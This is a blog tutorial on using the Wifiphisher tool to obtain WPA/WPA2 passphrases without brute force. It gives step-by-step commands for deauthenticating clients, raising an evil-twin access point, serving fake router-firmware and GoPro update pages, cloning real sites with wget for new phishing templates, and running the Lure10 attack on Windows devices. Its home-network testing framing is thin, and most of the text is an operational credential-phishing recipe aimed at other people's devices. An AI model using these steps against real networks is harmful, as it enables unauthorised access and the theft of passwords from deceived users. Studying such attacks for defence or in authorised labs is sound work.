Hack Wi-Fi Networks Without Cracking Wifiphisher
Welcome back in the last wireless hacking tutorial we talked a little about hacking WPA/WPA2 passphases using brute forcing methods. In this tutorial Hack Wi-Fi Networks Without Cracking Wifiphisher we will talk about hacking WPA/WPA2 networks without using brute force methods. By creating a Evil Twin access point that mimicks a nearby wireless access point we can easily trick clients into connecting to it and leak their credentials.
What is Wifiphisher
Wifiphisher is a wireless security tool that mounts automated victim customized phishing attacks against WiFi clients. This allows the attacker to obtain credentials or infect the target machine with malware. This method uses a social engineering attack method that can quickly trick the target into unknowingly handing over there password. Unlike other methods it does not include any brute forcing of any kind. It is an quick and easy way to obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.
Wifiphisher works on Kali Linux and is licensed under the GPL license.
Lets assume that we are testing security of our home network. We have turned off WPS and took all the precautions to safe guard our network against attackers. We have also changed the Password of the network AP to a strong password to prevent brute force attacks. Although there are others who use the same network from other devices who could potentially leak the wireless access point passphrase through human error. This Wireless attack relies on a little deception and trickery.
We can use Wifiphisher to trick the clients into openly and unknowingly handing over their wireless passphrase and other sensitive information.
To install Wifiphisher clone the script using git.
In a new terminal use these commands to download and install Wifiphisher.
git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher sudo python setup.py install
After the script has finished unpacking and installing resources we can start Wifiphisher.
python setup.py build && python setup.py install
1x Wireless Interface that supports Managed mode.
1x Wireless INterface that supports Monitor mode.
Kali Linux or Linux Operating System
First of all do a scan of near by access points we will be looking for wireless access points that have clients connected to the wireless network.
Start Wifiphisher using the following command.
Alternately use python bin/wifiphisher from Wifiphishers script location.
Specify Wireless Interfaces (Sometimes when starting Wifiphisher it will automatically select what network interfaces to use using the commands below we can specify what interfaces we want to use.)
Lets start first and up a new terminal and go to Wifiphishers download location using cd for example.
Now start wifiphisher replace wlan1, wlan2 with name of your Wireless interfaces.
python bin/wifiphisher -aI wlan1 -jI wlan2
(-aI = ap interface -jI = Jamming interface)
Wifiphisher will now start scanning for wireless Networks. From the Network list choose the target wireless network using up and down keys when you have found the target network press Enter.
A list of phishing scenarios will appear I will use 10 “Firmware Uprade Page” this page will display a router configuration page without any logos or branding asking for WPA/WPA2 network password due to a firmware update.”)
(When you first load Wifiphisher you will only have a few phishing Scenarios to choose from. I have added a lot to my list over time don’t worry if your list does not look like the one in the screen shot. I will show you how to add extra phishing scenarios later on in the tutorial.)
After selecting what phishing scenario we want to use Wifiphisher will start an Evil Twin access point and spawn a lister. Any clients connected to the Wireless network will be de-authencatd by Wifiphisher and forced to connect to the Evil Twin access point.
The screen shot below show the target client being authenticated to the Evil Twin hot spot created by Wifiphisher.
After the client authenticates to the network any website that the target tries to browse to in the web browser will be diverted to a fake page prompting for credentials.
The screen shot below shows what clients are being deauthencated by Wifiphisher in the right hand side we can see the Evil Twin access point created by Wifiphisher and what channel and interface its running on.
If you look at the section HTTP requests this shows what sites connected clients are looking for instead of loading the website the target client is looking for a fake phishing page created by Wifiphisher will appear.
GET = Sites clients are requesting.
POST = Post requests from connected clients. Requests with the tag POST will show POST requests that the target has sent over the network.
The POST request in the screen shot below shows credentials gathered by the web page attribute wfphshr-wpa-password. This POST request tells us that the target has entered the Wireless key “PRESH4REDK3Y”.
We have now successfully phished a Wireless network pass phrase using Wifiphisher. When we first installed Wifiphisher it will contain very limited phishing scenarios don’t worry we can add new phishing pages or even create our own Templates.
Installing Extra Phishing Scenario Pages
When you first install wifiphisher you will notice that there is a few phishing senerios to choose from for what ever reason you may want to add your own pages to wifiphisher.
1. Download Webpage
2. Copy webpage to wifiphisher
3. Edit Html webpages to suit Wifiphishers configuration
4. Create a config file (This will allow us to intergrate our pages into wifiphishers menu.)
Downloading Web Pages from Linux Terminal
wget -E -H -k -K -p <insert URL here> wget --page-requisites --https-only -K --no-clobber https://hackingvision.com What these wget options do. -E, --adjust-extension save HTML/CSS documents with proper extensions -H, --span-hosts go to foreign hosts when recursive -K, --backup-converted before converting file X, back up as X.orig -k, --convert-links make links in downloaded HTML or CSS point to -p, --page-requisites Include page requisites
You could create your own Templates in HTML, PHP, CSS and add attributes your self. This provides a quick way of creating new compatible templates in the older version of Wifiphisher attribute wpshr- must have been added the new version of Wifiphisher allows us to use any attribute.
Open up your scripts download location and navigate to wifiphisher/wifiphisher/data/phishing-pages. Folder names must be lowercase alfa without spaces for example “my-phishing-page”.
Lets take a deeper look inside the configuration files this will give you an idea of how Wifiphisher adds new phishing scenarios to its menu without editing the script directly the screen shot below shows the structure of a phishing template directory.
Each template has its own config.ini files these files are used to describe templates and quickly add them to Wifiphishers menu. This is an example of a configuration file simply rename the template and add a description you can remove the context if you wish it will not effect the scripts ability to run you can also edit context to suit the target AP vendor.
Name: Firmware Upgrade Page
Description: A router configuration page without logos or brands asking for WPA/WPA2 password due to a firmware upgrade. Mobile-friendly.
# Comment in the line below to override automatic vendor detection
# target_ap_vendor: AP_VENDOR
As an example I have added Gopro Camera phishing page prompting for an important update.
The screen shot below shows credentials gathered by the fake GoPro page.
Wifiphisher we can also supports Lure10 attacks.
Lure10 attacks make nearby Windows devices believe that are within the area that was previously captured with
Lure10 fools the Windows Location Service into sending out Broadcast message that a WLAN that is tagged as WiFi-Sense in that area.
To use Lure10 exploit use the following command.
python bin/wifiphisher --lure10-exploit area_20170414_123200 --essid "WiFiSense-Tagged-WLAN
If you would like to create a Wireless Access point with a specific name use –essid options.
Thanks for supporting HackingVision if you enjoyed this article Wi-Fi Networks Without Cracking Wifiphisher consider sharing with friends.